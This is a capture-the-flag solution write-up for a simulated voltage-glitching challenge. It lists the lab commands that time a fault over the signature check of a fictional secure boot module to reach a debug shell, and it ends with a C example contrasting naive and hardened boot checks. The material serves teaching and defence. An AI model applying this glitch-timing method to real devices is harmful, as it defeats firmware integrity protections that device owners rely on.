# Glitch The Wired — Solution

## Overview

This challenge simulates a voltage glitching attack on a WIRED-MED secure boot module. The goal is to inject a fault during the signature verification phase to bypass it and access the debug console.

## Steps

1. Connect to the glitch lab:

```bash
nc <host> 3700
```

2. Observe the boot sequence:

```
observe
```

Note the cycle ranges — SIG_VERIFY runs at cycles 3200-3400.

3. Configure glitch parameters:

```
set_delay 3300
set_width 20
```

The delay targets the middle of the SIG_VERIFY window. A width of 10-30 cycles works.

4. Arm and trigger:

```
arm
trigger
```

If successful, the boot log shows "SIG_VERIFY ....... SKIPPED" and a debug shell activates.

5. Read the debug console:

```
read_console
```

The flag is in the maintenance token output.

## Key Concepts

- **Voltage glitching**: Briefly disrupting the power supply to cause CPU instruction skips
- **Secure boot bypass**: Skipping signature verification allows unsigned code to run
- **Timing precision**: The glitch must overlap with the target operation's execution window
- **Width matters**: Too short = transient recovery, too wide = brown-out crash
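
The defensive side of the bypass above, as an added example that is not part of the original write-up or the challenge's code: a boot decision with a permissive default and a single check, next to a fail-closed version that verifies twice. The fault model (one skipped step per boot, selected by `skip_step`), the function names and the sample digests are assumptions made for illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Constructed constants: bitwise complements, so one flipped bit cannot turn FAIL into OK. */
#define BOOT_OK   0x3CA5965Au
#define BOOT_FAIL 0xC35A69A5u

/* Constructed sample digests: the expected value and a tampered image's value. */
static const uint8_t WANT[4]     = {0xde, 0xad, 0xbe, 0xef};
static const uint8_t TAMPERED[4] = {0xde, 0xad, 0xbe, 0xee};

/* Hypothetical stand-in for SIG_VERIFY: full-length digest compare, no early exit. */
static uint32_t sig_verify(const uint8_t *got, const uint8_t *want, size_t n) {
    uint8_t diff = 0;
    for (size_t i = 0; i < n; i++) diff |= (uint8_t)(got[i] ^ want[i]);
    return diff == 0 ? BOOT_OK : BOOT_FAIL;
}

/* skip_step models a fault that skips one numbered step (0 = no fault). */

/* Naive: permissive default and a single check. Skipping step 1 boots anything. */
int boot_naive(const uint8_t *got, const uint8_t *want, size_t n, int skip_step) {
    int allow = 1;
    if (skip_step != 1 && sig_verify(got, want, n) != BOOT_OK) allow = 0; /* step 1 */
    return allow;
}

/* Hardened: results default to FAIL, verification runs twice, and each result is
 * tested separately, so no single skipped step yields a boot. */
int boot_hardened(const uint8_t *got, const uint8_t *want, size_t n, int skip_step) {
    volatile uint32_t r1 = BOOT_FAIL, r2 = BOOT_FAIL;
    if (skip_step != 1) r1 = sig_verify(got, want, n);   /* step 1 */
    if (skip_step != 2) r2 = sig_verify(got, want, n);   /* step 2 */
    if (skip_step != 3 && r1 != BOOT_OK) return 0;       /* step 3 */
    if (skip_step != 4 && r2 != BOOT_OK) return 0;       /* step 4 */
    return 1;
}

int main(void) {
    for (int s = 0; s <= 4; s++)
        printf("skip step %d: naive=%d hardened=%d\n", s,
               boot_naive(TAMPERED, WANT, 4, s), boot_hardened(TAMPERED, WANT, 4, s));
    return 0;
}
```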